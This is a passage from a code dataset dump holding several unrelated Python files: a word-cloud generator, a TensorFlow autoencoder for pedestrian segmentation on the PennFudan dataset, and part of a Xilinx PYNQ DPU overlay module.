one_hot_encode_column(new_data,'city')\n# print(new_data1.shape)\n# print(new_data1)\n\n\n# def process_all_data(dataframe):\n# columns = dataframe.columns\n# new_data = dataframe\n# for i in columns:\n# if new_data[i].dtype == 'object':\n# new_data_middle =one_hot_encode_column(new_data,i)\n# new_data = new_data_middle\n# return new_data\n\n#\n# new_data_final = process_all_data(data)\n# print(new_data_final.shape)\n\n# columns = data.columns\n# new_data = data\n# for i in columns:\n# if data[i].dtype == 'object':\n# new_data_middle = one_hot_encode_column(new_data,i)\n# new_data = new_data_middle\n#\n# print(new_data.shape)\n\n\n# One-hot encode all of the string columns:\n","sub_path":"use_CNN_to_predict/test_one_hot_encoding.py","file_name":"test_one_hot_encoding.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"452074000","text":"# Used to build the word cloud\nimport wordcloud\n# Used to load the word-cloud shape images\nimport imageio\n# Used to turn the List into a string\nimport jieba\n\n# Load the shape masks for the word cloud, to be chosen from later\nmk_1 = imageio.imread(\"dollar.png\")\nmk_2 = imageio.imread(\"money.png\")\nmk_3 = imageio.imread(\"robot.png\")\nmk_4 = imageio.imread(\"chinamap.png\")\n\n\n# Just pass in the already-processed List as the argument\ndef make_word_cloud(textlist):\n # Choose the word-cloud background\n a = choosing_background()\n # Create the word-cloud object\n w = create_one(mk=a)\n # Turn the input List into a string\n string = \" \".join(textlist)\n # Combine the word-cloud object with the text\n w.generate(string)\n saving(w)\n print(\"Word cloud generated successfully!\")\n\n\n# Choose the word-cloud background; only mk_1 and mk_3 were picked out here, the rest can be tuned later\ndef choosing_background():\n print(\"Tell me which word-cloud background you want.\\n\")\n print(\"1 or 2 for finance, 3 for tech, 4 for a map of China\")\n # Without this line, \"local variable 'mk' referenced before assignment\" would occur, so assign a default value first\n mk = imageio.imread(\"dollar.png\")\n loop = 1\n while loop == 1:\n # input() returns a string, so compare against string values\n option = input(\"Your choice: \")\n if option == '1':\n mk = mk_1\n break\n elif option == '2':\n mk = mk_2\n break\n elif option == '3':\n mk = mk_3\n break\n elif option == '4':\n mk = mk_4\n break\n else:\n pass\n break\n return mk\n\n\n# Create a word-cloud object, passing in the chosen background mask as the argument\ndef create_one(mk):\n w = wordcloud.WordCloud(width=1000,\n height=700,\n background_color='white',\n font_path='msyh.ttc',\n scale=15,\n mask=mk,\n )\n return w\n\n\n# Save as an image; a name has to be chosen when writing the output file\ndef saving(w):\n name = input(\"What should this word cloud be called: \")\n picture_name = \"{x}.png\".format(x=name)\n w.to_file(picture_name)\n\n\nif __name__ == '__main__':\n # A preset list to try out; it does generate a word cloud, though the list is too small to show much\n words = ['动力学', '和', '电磁学']\n make_word_cloud(textlist=words)\n","sub_path":"Word_cloud/word_cloud.py","file_name":"word_cloud.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"493061608","text":"import tensorflow as tf\nimport numpy as np\nimport sys, os,cv2\nfrom sklearn.utils import shuffle\nfrom scipy.misc import imread,imresize\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import OneHotEncoder\nfrom skimage.transform import resize\nfrom imgaug import augmenters as iaa\nimport imgaug as ia\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom skimage.color import rgba2rgb,rgb2gray\n\nold_v = tf.logging.get_verbosity()\ntf.logging.set_verbosity(tf.logging.ERROR)\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nplt.style.use('seaborn-white')\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nnp.random.seed(6278)\ntf.set_random_seed(6728)\nia.seed(6278)\n\n# ======= Activation Function ==========\ndef tf_elu(x): return tf.nn.elu(x)\ndef d_tf_elu(x): return tf.cast(tf.greater(x,0),tf.float32) + (tf_elu(tf.cast(tf.less_equal(x,0),tf.float32) * x) + 1.0)\n\ndef tf_tanh(x): return tf.nn.tanh(x)\ndef d_tf_tanh(x): return 1 - tf_tanh(x) ** 2\n\ndef tf_sigmoid(x): return tf.nn.sigmoid(x) \ndef d_tf_sigmoid(x): return tf_sigmoid(x) * (1.0-tf_sigmoid(x))\n\ndef tf_atan(x): return tf.atan(x)\ndef d_tf_atan(x): return 1.0/(1.0 + x**2)\n\ndef tf_iden(x): return x\ndef d_tf_iden(x): return 1.0\n\ndef tf_softmax(x): return tf.nn.softmax(x)\n# ======= Activation Function ==========\n\n# ====== miscellaneous =====\n# code from: https://github.com/tensorflow/tensorflow/issues/8246\ndef tf_repeat(tensor, repeats):\n \"\"\"\n Args:\n\n input: A Tensor. 1-D or higher.\n repeats: A list. 
Number of repeat for each dimension, length must be the same as the number of dimensions in input\n\n Returns:\n \n A Tensor. Has the same type as input. Has the shape of tensor.shape * repeats\n \"\"\"\n expanded_tensor = tf.expand_dims(tensor, -1)\n multiples = [1] + repeats\n tiled_tensor = tf.tile(expanded_tensor, multiples = multiples)\n repeated_tesnor = tf.reshape(tiled_tensor, tf.shape(tensor) * repeats)\n return repeated_tesnor\n\ndef unpickle(file):\n import pickle\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n# ====== miscellaneous =====\n\n# ================= VIZ =================\n# Def: Simple funciton to view the histogram of weights\ndef show_hist_of_weigt(all_weight_list,status='before'):\n fig = plt.figure()\n weight_index = 0\n\n for i in range(1,1+int(len(all_weight_list)//3)):\n ax = fig.add_subplot(1,4,i)\n ax.grid(False)\n temp_weight_list = all_weight_list[weight_index:weight_index+3]\n for temp_index in range(len(temp_weight_list)):\n current_flat = temp_weight_list[temp_index].flatten()\n ax.hist(current_flat,histtype='step',bins='auto',label=str(temp_index+weight_index))\n ax.legend()\n ax.set_title('From Layer : '+str(weight_index+1)+' to '+str(weight_index+3))\n weight_index = weight_index + 3\n plt.savefig('viz/weights_'+str(status)+\"_training.png\")\n plt.close('all')\n\n# Def: Simple function to show 9 image with different channels\ndef show_9_images(image,layer_num,image_num,channel_increase=3,alpha=None,gt=None,predict=None):\n image = (image-image.min())/(image.max()-image.min())\n fig = plt.figure()\n color_channel = 0\n limit = 10\n if alpha: limit = len(gt)\n for i in range(1,limit):\n ax = fig.add_subplot(3,3,i)\n ax.grid(False)\n ax.set_xticks([])\n ax.set_yticks([])\n if alpha:\n ax.set_title(\"GT: \"+str(gt[i-1])+\" Predict: \"+str(predict[i-1]))\n else:\n ax.set_title(\"Channel : \" + str(color_channel) + \" : \" + str(color_channel+channel_increase-1))\n ax.imshow(np.squeeze(image[:,:,color_channel:color_channel+channel_increase]))\n color_channel = color_channel + channel_increase\n \n if alpha:\n plt.savefig('viz/z_'+str(alpha) + \"_alpha_image.png\")\n else:\n plt.savefig('viz/'+str(layer_num) + \"_layer_\"+str(image_num)+\"_image.png\")\n plt.close('all')\n# ================= VIZ =================\n\n# ================= LAYER CLASSES =================\nclass CNN():\n \n def __init__(self,k,inc,out,act=tf_elu,d_act=d_tf_elu):\n self.w = tf.Variable(tf.random_normal([k,k,inc,out],stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def getw(self): return self.w\n\n def feedforward(self,input,stride=1,padding='SAME'):\n self.input = input\n self.layer = tf.nn.conv2d(input,self.w,strides=[1,stride,stride,1],padding=padding) \n self.layerA = self.act(self.layer)\n return self.layerA \n\n def backprop(self,gradient,stride=1,padding='SAME'):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n\n grad = tf.nn.conv2d_backprop_filter(input = grad_part_3,filter_sizes = self.w.shape,out_backprop = grad_middle,\n strides=[1,stride,stride,1],padding=padding\n )\n\n grad_pass = tf.nn.conv2d_backprop_input(input_sizes = [batch_size] + list(grad_part_3.shape[1:]),filter= self.w,out_backprop = grad_middle,\n strides=[1,stride,stride,1],padding=padding\n )\n\n update_w = []\n update_w.append(tf.assign( 
self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass CNN_Trans():\n \n def __init__(self,k,inc,out,act=tf_elu,d_act=d_tf_elu):\n self.w = tf.Variable(tf.random_normal([k,k,inc,out],stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def getw(self): return self.w\n\n def feedforward(self,input,stride=1,padding='SAME'):\n self.input = input\n output_shape2 = self.input.shape[2].value * stride\n self.layer = tf.nn.conv2d_transpose(\n input,self.w,output_shape=[batch_size,output_shape2,output_shape2,self.w.shape[2].value],\n strides=[1,stride,stride,1],padding=padding) \n self.layerA = self.act(self.layer)\n return self.layerA \n\n def backprop(self,gradient,stride=1,padding='SAME'):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n\n grad = tf.nn.conv2d_backprop_filter(input = grad_middle,\n filter_sizes = self.w.shape,out_backprop = grad_part_3,\n strides=[1,stride,stride,1],padding=padding\n )\n\n grad_pass = tf.nn.conv2d(\n input=grad_middle,filter = self.w,strides=[1,stride,stride,1],padding=padding\n )\n \n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass FNN():\n \n def __init__(self,input_dim,hidden_dim,act,d_act):\n self.w = tf.Variable(tf.random_normal([input_dim,hidden_dim], stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.v_hat_prev = tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def feedforward(self,input=None):\n self.input = input\n self.layer = tf.matmul(input,self.w)\n self.layerA = self.act(self.layer)\n return self.layerA\n\n def backprop(self,gradient=None):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n grad = tf.matmul(tf.transpose(grad_part_3),grad_middle)\n grad_pass = tf.matmul(tf.multiply(grad_part_1,grad_part_2),tf.transpose(self.w))\n\n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass ICA_Layer():\n\n def __init__(self,inc):\n self.w_ica = tf.Variable(tf.random_normal([inc,inc],stddev=0.05,seed=2)) \n # self.w_ica = tf.Variable(tf.eye(inc)*0.0001) \n\n def feedforward(self,input):\n self.input = input\n self.ica_est = tf.matmul(input,self.w_ica)\n self.ica_est_act = tf_atan(self.ica_est)\n return 
self.ica_est_act\n\n def backprop(self):\n grad_part_2 = d_tf_atan(self.ica_est)\n grad_part_3 = self.input\n\n grad_pass = tf.matmul(grad_part_2,tf.transpose(self.w_ica))\n g_tf = tf.linalg.inv(tf.transpose(self.w_ica)) - (2/batch_size) * tf.matmul(tf.transpose(self.input),self.ica_est_act)\n\n update_w = []\n update_w.append(tf.assign(self.w_ica,self.w_ica+0.2*g_tf))\n\n return grad_pass,update_w \n\nclass Sparse_Filter_Layer():\n \n def __init__(self,outc,changec):\n self.w = tf.Variable(tf.truncated_normal([outc,changec],stddev=0.5,seed=2,dtype=tf.float64))\n self.epsilon = 1e-10\n\n def getw(self): return self.w\n\n def soft_abs(self,value):\n return tf.sqrt(value ** 2 + self.epsilon)\n\n def feedforward(self,input):\n self.sparse_layer = tf.matmul(input,self.w)\n second = tf.nn.elu(self.sparse_layer)\n # second = self.soft_abs(self.sparse_layer )\n third = tf.divide(second,tf.sqrt(tf.reduce_sum(second**2,axis=0)+self.epsilon))\n four = tf.divide(third,tf.sqrt(tf.reduce_sum(third**2,axis=1)[:,tf.newaxis] +self.epsilon))\n self.cost_update = tf.reduce_mean(four)\n return self.sparse_layer ,self.cost_update\n\n# ================= LAYER CLASSES =================\n\n# data\nPathDicom = \"../../Dataset/PennFudanPed/PNGImages/\"\nimage_list = [] # create an empty list\nfor dirName, subdirList, fileList in os.walk(PathDicom):\n for filename in fileList:\n if \".png\" in filename.lower() : # check whether the file's DICOM \\PedMasks\n image_list.append(os.path.join(dirName,filename))\n\nmask_list = [] # create an empty list\nPathDicom = \"../../Dataset/PennFudanPed/PedMasks/\"\nfor dirName, subdirList, fileList in os.walk(PathDicom):\n for filename in fileList:\n if \".png\" in filename.lower() : # check whether the file's DICOM \\PedMasks\n mask_list.append(os.path.join(dirName,filename))\n\nimage_resize_px = 96 \ntrain_images = np.zeros(shape=(170,image_resize_px,image_resize_px,3))\ntrain_labels = np.zeros(shape=(170,image_resize_px,image_resize_px,1))\n\nfor file_index in range(len(image_list)):\n train_images[file_index,:,:] = imresize(imread(image_list[file_index],mode='RGB'),(image_resize_px,image_resize_px))\n train_labels[file_index,:,:] = np.expand_dims(imresize(rgb2gray(imread(mask_list[file_index],mode='RGB')),(image_resize_px,image_resize_px)),3) \n\n\ntrain_labels = (train_labels>25.0) * 255.0\ntrain_images = train_images/255.0\ntrain_labels = train_labels/255.0\n\ntrain_batch = train_images[:84]\ntrain_label = train_labels[:84]\ntest_batch = train_images[84:]\ntest_label = train_labels[84:]\n\n# print out the data shape\nprint(train_batch.shape)\nprint(train_batch.max())\nprint(train_batch.min())\nprint(train_label.shape)\nprint(train_label.max())\nprint(train_label.min())\n\nprint(test_batch.shape)\nprint(test_batch.max())\nprint(test_batch.min())\nprint(test_label.shape)\nprint(test_label.max())\nprint(test_label.min())\n\n# f, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\n# for xx in range(len(train_images)):\n# ax1.imshow(train_images[xx])\n# ax2.imshow(np.squeeze(train_labels[xx]))\n# plt.pause(0.5)\n# plt.cla()\n\n# class\nel1 = CNN(3,3,4)\nel2 = CNN(3,4,8)\nel3 = CNN(3,8,16)\nel4 = CNN(3,16,32)\n\nreduce_dim = 4\n# sparse_layer = Sparse_Filter_Layer(6*6*32,1*1*reduce_dim)\nfully_0 = FNN(6*6*32,reduce_dim,act=tf_elu,d_act=d_tf_elu)\n\ndl0 = CNN_Trans(3,4,1)\ndl1 = CNN_Trans(3,4,4)\nfl1 = CNN(3,4,4)\n\ndl2 = CNN_Trans(3,4,20)\nfl2 = CNN(3,4,4)\n\ndl3 = CNN_Trans(3,4,12)\nfl3 = CNN(3,4,4)\n\ndl4 = CNN_Trans(3,4,8)\nfl4 = CNN(3,4,1,act=tf_sigmoid)\n\n# hyper\nnum_epoch = 
1201\nlearning_rate = 0.0005\nbatch_size = 1\nprint_size = 100\n\n# graph\nx = tf.placeholder(shape=[batch_size,image_resize_px,image_resize_px,3],dtype=tf.float64)\ny = tf.placeholder(shape=[batch_size,image_resize_px,image_resize_px,1],dtype=tf.float64)\n\nelayer1 = el1.feedforward(x)\n\nelayer2_input = tf.nn.max_pool(elayer1,strides=[1,2,2,1],ksize=[1,2,2,1],padding='VALID')\nelayer2 = el2.feedforward(elayer2_input)\n\nelayer3_input = tf.nn.avg_pool(elayer2,strides=[1,2,2,1],ksize=[1,2,2,1],padding='VALID')\nelayer3 = el3.feedforward(elayer3_input)\n\nelayer4_input = tf.nn.max_pool(elayer3,strides=[1,2,2,1],ksize=[1,2,2,1],padding='VALID')\nelayer4 = el4.feedforward(elayer4_input)\n\nsparse_input = tf.nn.avg_pool(elayer4,strides=[1,2,2,1],ksize=[1,2,2,1],padding='VALID')\nsparse_layer_input = tf.reshape(sparse_input,[batch_size,-1])\nfully_connected_layer = fully_0.feedforward(sparse_layer_input)\n\ndlayer0_input = tf.reshape(fully_connected_layer,[batch_size,2,2,1])\ndlayer0_input = tf.image.resize_images(dlayer0_input, [6, 6],method=tf.image.ResizeMethod.BILINEAR,align_corners=False)\ndlayer0_input2 = tf.cast(dlayer0_input,dtype=tf.float64)\ndlayer0 = dl0.feedforward(dlayer0_input2,stride=1) # 3 3\n\ndlayer01 = tf.image.resize_images(dlayer0, [12, 12],method=tf.image.ResizeMethod.BICUBIC,align_corners=False)\ndlayer01 = tf.cast(dlayer01,dtype=tf.float64)\ndlayer1 = dl1.feedforward(dlayer01) # 6 6\nflayer1 = fl1.feedforward(dlayer1)\n\nflayer11 = tf.image.resize_images(flayer1, [24, 24],method=tf.image.ResizeMethod.BILINEAR,align_corners=False)\nflayer11 = tf.cast(flayer11,dtype=tf.float64)\n\ndlayer2 = dl2.feedforward(tf.concat([flayer11,elayer3],3),stride=1) # 8 8\nflayer2 = fl2.feedforward(dlayer2)\n\nflayer21 = tf.image.resize_images(flayer2, [48, 48],method=tf.image.ResizeMethod.BILINEAR,align_corners=False)\nflayer21 = tf.cast(flayer21,dtype=tf.float64)\n\ndlayer3 = dl3.feedforward(tf.concat([flayer21,elayer2],3))\nflayer3 = fl3.feedforward(dlayer3)\n\nflayer31 = tf.image.resize_images(flayer3, [96, 96],method=tf.image.ResizeMethod.BICUBIC,align_corners=False)\nflayer31 = tf.cast(flayer31,dtype=tf.float64)\n\ndlayer4 = dl4.feedforward(tf.concat([flayer31,elayer1],3),stride=1)\nflayer5 = fl4.feedforward(dlayer4)\n\ncost0 = tf.reduce_mean(tf.square(flayer5-y))\n\ntotal_cost = cost0 \nauto_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(total_cost)\n\n# sess\nwith tf.Session() as sess:\n\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n\n train_cota,train_acca = 0,0\n train_cot,train_acc = [],[]\n \n test_cota,test_acca = 0,0\n test_cot,test_acc = [],[]\n\n # start the training\n for iter in range(num_epoch):\n\n train_batch,train_label = shuffle(train_batch,train_label)\n test_batch,test_label = shuffle(test_batch,test_label)\n\n # train for batch\n for batch_size_index in range(0,len(train_batch),batch_size):\n current_batch = train_batch[batch_size_index:batch_size_index+batch_size]\n current_batch_label = train_label[batch_size_index:batch_size_index+batch_size]\n sess_result = sess.run([total_cost,auto_train],feed_dict={x:current_batch,y:current_batch_label})\n print(\"Current Iter : \",iter ,' Current cost: ', sess_result[0],end='\\r')\n train_cota = train_cota + sess_result[0]\n\n # if it is print size print the cost and Sample Image\n if iter % print_size==0:\n print(\"\\n--------------\") \n print('Current Iter: ',iter,' Accumulated Train cost : ', train_cota/(len(train_batch)/(batch_size)),end='\\n')\n 
print(\"--------------\")\n\n # get one image from train batch and show results\n sess_results = sess.run(flayer5,feed_dict={x:train_batch[:batch_size]})\n test_change_image = train_batch[0,:,:,:]\n test_change_gt = train_label[0,:,:,:]\n test_change_predict = sess_results[0,:,:,:]\n\n f, axarr = plt.subplots(2, 3,figsize=(27,18))\n plt.suptitle('Original Image (left) Generated Image (right) Iter: ' + str(iter),fontsize=20)\n axarr[0, 0].axis('off')\n axarr[0, 0].imshow(np.squeeze(test_change_image),cmap='gray')\n\n axarr[0, 1].axis('off')\n axarr[0, 1].imshow(np.squeeze(test_change_gt),cmap='gray')\n\n axarr[0, 2].axis('off')\n axarr[0, 2].imshow(np.squeeze(test_change_predict),cmap='gray')\n\n axarr[1, 0].axis('off')\n axarr[1, 0].imshow(np.squeeze(test_change_image),cmap='gray')\n\n axarr[1, 1].axis('off')\n axarr[1, 1].imshow(test_change_gt*np.squeeze(test_change_image),cmap='gray')\n\n axarr[1, 2].axis('off')\n axarr[1, 2].imshow(test_change_predict*np.squeeze(test_change_image),cmap='gray')\n\n plt.savefig('train_change/'+str(iter)+\"_train_results.png\",bbox_inches='tight')\n plt.close('all')\n\n # get one image from test batch and show results\n sess_results = sess.run(flayer5,feed_dict={x:test_batch[:batch_size]})\n test_change_image = test_batch[:batch_size][0,:,:,:]\n test_change_gt = test_label[0,:,:,:]\n test_change_predict = sess_results[0,:,:,:]\n\n f, axarr = plt.subplots(2, 3,figsize=(27,18))\n plt.suptitle('Original Image (left) Generated Image (right) Iter: ' + str(iter),fontsize=20)\n axarr[0, 0].axis('off')\n axarr[0, 0].imshow(np.squeeze(test_change_image),cmap='gray')\n\n axarr[0, 1].axis('off')\n axarr[0, 1].imshow(np.squeeze(test_change_gt),cmap='gray')\n\n axarr[0, 2].axis('off')\n axarr[0, 2].imshow(np.squeeze(test_change_predict),cmap='gray')\n\n axarr[1, 0].axis('off')\n axarr[1, 0].imshow(np.squeeze(test_change_image),cmap='gray')\n\n axarr[1, 1].axis('off')\n axarr[1, 1].imshow(test_change_gt*np.squeeze(test_change_image),cmap='gray')\n\n axarr[1, 2].axis('off')\n axarr[1, 2].imshow(test_change_predict*np.squeeze(test_change_image),cmap='gray')\n\n plt.savefig('test_change/'+str(iter)+\"_test_results.png\",bbox_inches='tight')\n plt.close('all')\n\n train_cot.append(train_cota/(len(train_batch)/(batch_size)))\n train_cota,train_acca = 0,0\n\n # Normalize the cost of the training\n train_cot = (train_cot-min(train_cot) ) / (max(train_cot)-min(train_cot))\n\n # plot the training and testing graph\n plt.figure()\n plt.plot(range(len(train_cot)),train_cot,color='green',label='cost ovt')\n plt.legend()\n plt.title(\"Train Average Accuracy / Cost Over Time\")\n plt.savefig(\"viz/Case Train.png\")\n plt.close('all')\n\n # final all train images\n for batch_size_index in range(0,len(train_batch),batch_size):\n current_batch = train_batch[batch_size_index:batch_size_index+batch_size] \n current_batch_label = train_label[batch_size_index:batch_size_index+batch_size]\n sess_results = sess.run(flayer5,feed_dict={x:current_batch})\n for xx in range(len(sess_results)):\n f, axarr = plt.subplots(2, 3,figsize=(27,18))\n\n # test_change_predict = (sess_results[xx]-sess_results[xx].min())/(sess_results[xx].max()-sess_results[xx].min())\n test_change_predict = sess_results[xx]\n\n plt.suptitle('Final Train Images : ' + str(xx) ,fontsize=20)\n axarr[0, 0].axis('off')\n axarr[0, 0].imshow(np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[0, 1].axis('off')\n axarr[0, 1].imshow(np.squeeze(current_batch_label[xx]),cmap='gray')\n\n axarr[0, 2].axis('off')\n axarr[0, 
2].imshow(np.squeeze(test_change_predict),cmap='gray')\n\n axarr[1, 0].axis('off')\n axarr[1, 0].imshow(np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[1, 1].axis('off')\n axarr[1, 1].imshow(current_batch_label[xx]*np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[1, 2].axis('off')\n axarr[1, 2].imshow(test_change_predict*np.squeeze(current_batch[xx]),cmap='gray')\n\n plt.savefig('final_train/'+str(batch_size_index)+\"_\"+str(xx)+\"_train_results.png\",bbox_inches='tight')\n plt.close('all')\n\n\n for batch_size_index in range(0,len(test_batch),batch_size):\n current_batch = test_batch[batch_size_index:batch_size_index+batch_size] \n current_batch_label = test_label[batch_size_index:batch_size_index+batch_size]\n sess_results = sess.run(flayer5,feed_dict={x:current_batch})\n for xx in range(len(sess_results)):\n f, axarr = plt.subplots(2, 3,figsize=(27,18))\n \n # test_change_predict = (sess_results[xx]-sess_results[xx].min())/(sess_results[xx].max()-sess_results[xx].min())\n test_change_predict = sess_results[xx]\n\n plt.suptitle('Final Test Images : ' + str(xx) ,fontsize=20)\n axarr[0, 0].axis('off')\n axarr[0, 0].imshow(np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[0, 1].axis('off')\n axarr[0, 1].imshow(np.squeeze(current_batch_label[xx]),cmap='gray')\n\n axarr[0, 2].axis('off')\n axarr[0, 2].imshow(np.squeeze(test_change_predict),cmap='gray')\n\n axarr[1, 0].axis('off')\n axarr[1, 0].imshow(np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[1, 1].axis('off')\n axarr[1, 1].imshow(current_batch_label[xx]*np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[1, 2].axis('off')\n axarr[1, 2].imshow(test_change_predict*np.squeeze(current_batch[xx]),cmap='gray')\n\n plt.savefig('final_test/'+str(batch_size_index)+\"_\"+str(xx)+\"_test_results.png\",bbox_inches='tight')\n plt.close('all')\n\n\n# -- end code --","sub_path":"NeuralNetwork/Sparse_Auto/z_z_archieve/y_backup_compare.py","file_name":"y_backup_compare.py","file_ext":"py","file_size_in_byte":22753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"373218062","text":"# Copyright (C) 2021 Xilinx, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport sys\nif '/usr/lib/python3.6/site-packages' not in sys.path:\n sys.path.append('/usr/lib/python3.6/site-packages')\n\n\nimport os\nimport subprocess\nfrom ctypes import *\nfrom typing import List\nimport pynq\nimport vart\nimport xir\n\n\n__author__ = \"Yun Rock Qu, Jingwei Zhang\"\n__copyright__ = \"Copyright 2021, Xilinx\"\n__email__ = \"pynq_support@xilinx.com\"\n\n\nMODULE_PATH = os.path.dirname(os.path.realpath(__file__))\nOVERLAY_PATH = os.path.join(MODULE_PATH, 'overlays')\nXCL_DST_PATH = \"/usr/lib\"\n\n\ndef get_child_subgraph_dpu(graph: \"Graph\"):\n assert graph is not None, \\\n \"Input Graph object should not be None.\"\n root_subgraph = graph.get_root_subgraph()\n assert root_subgraph is not None, \\\n \"Failed to get root subgraph of input Graph object.\"\n if root_subgraph.is_leaf:\n return []\n 
child_subgraphs = root_subgraph.toposort_child_subgraph()\n assert child_subgraphs is not None and len(child_subgraphs) > 0\n return [cs\n for cs in child_subgraphs\n if cs.has_attr(\"device\") and cs.get_attr(\"device\").upper() == \"DPU\"]\n\n\nclass DpuOverlay(pynq.Overlay):\n \"\"\"DPU overlay class.\n\n This class inherits from the PYNQ overlay class. The initialization method\n is similar except that we have additional bit file search paths.\n\n \"\"\"\n def __init__(self, bitfile_name, dtbo=None,\n download=True, ignore_version=False, device=None):\n \"\"\"Initialization method.\n\n Check PYNQ overlay class for more information on parameters.\n\n By default, the bit file will be searched in the following paths:\n (1) the `overlays` folder inside this module; (2) an absolute path;\n (3) the relative path of the current working directory.\n\n By default, this class will set the runtime to be `dnndk`.\n\n \"\"\"\n if os.path.isfile(bitfile_name):\n abs_bitfile_name = bitfile_name\n elif os.path.isfile(os.path.join(OVERLAY_PATH, bitfile_name)):\n abs_bitfile_name = os.path.join(OVERLAY_PATH, bitfile_name)\n else:\n raise FileNotFoundError('Cannot find {}.'.format(bitfile_name))\n super().__init__(abs_bitfile_name,\n dtbo=dtbo,\n download=download,\n ignore_version=ignore_version,\n device=device)\n self.overlay_dirname = os.path.dirname(self.bitfile_name)\n self.overlay_basename = os.path.basename(self.bitfile_name)\n self.runner = None\n self.graph = None\n\n def download(self):\n \"\"\"Download the overlay.\n\n This method overrides the existing `download()` method defined in\n the overlay class. It will download the bitstream, set AXI data width,\n and copy the xclbin file.\n\n \"\"\"\n super().download()\n self.overlay_dirname = os.path.dirname(self.bitfile_name)\n self.overlay_basename = os.path.basename(self.bitfile_name)\n self.copy_xclbin()\n\n def copy_xclbin(self):\n \"\"\"Copy the xclbin file to a specific location.\n\n This method will copy the xclbin file into the destination directory to\n make sure DNNDK libraries can work without problems.\n\n The xclbin file, if not set explicitly, is required to be located\n in the same folder as the bitstream and hwh files.\n\n The destination folder by default is `/usr/lib`.\n\n \"\"\"\n # Strip the .bit suffix with splitext; rstrip(\".bit\") strips a character\n # set, which corrupts basenames ending in 'b', 'i' or 't'\n abs_xclbin = self.overlay_dirname + \"/\" + \\\n os.path.splitext(self.overlay_basename)[0] + \".xclbin\"\n if not os.path.isfile(abs_xclbin):\n raise ValueError(\n \"File {} does not exist.\".format(abs_xclbin))\n\n if not os.path.isdir(XCL_DST_PATH):\n raise ValueError(\n \"Folder {} does not exist.\".format(XCL_DST_PATH))\n _ = subprocess.check_output([\"cp\", \"-f\",\n abs_xclbin, XCL_DST_PATH])\n\n def load_model(self, model):\n \"\"\"Load DPU models for both DNNDK runtime and VART.\n\n For DNNDK, this method would take the ML model `*.elf` binary file and\n compile it into a `*.so` file located in the destination directory\n on the target. This will make sure DNNDK libraries can work\n without problems.\n\n The ML model file, if not set explicitly, is required to be located\n in the same folder as the bitstream and hwh files.\n\n The destination folder by default is `/usr/lib`.\n\n Currently only `*.xmodel` files are supported as models; `*.so`\n files are not, since they usually have to be recompiled targeting a\n specific rootfs.\n\n For VART, this method will automatically generate the `meta.json` file\n in the same folder as the model file.\n\n Parameters\n ----------\n model : str\n The name of the ML model binary. 
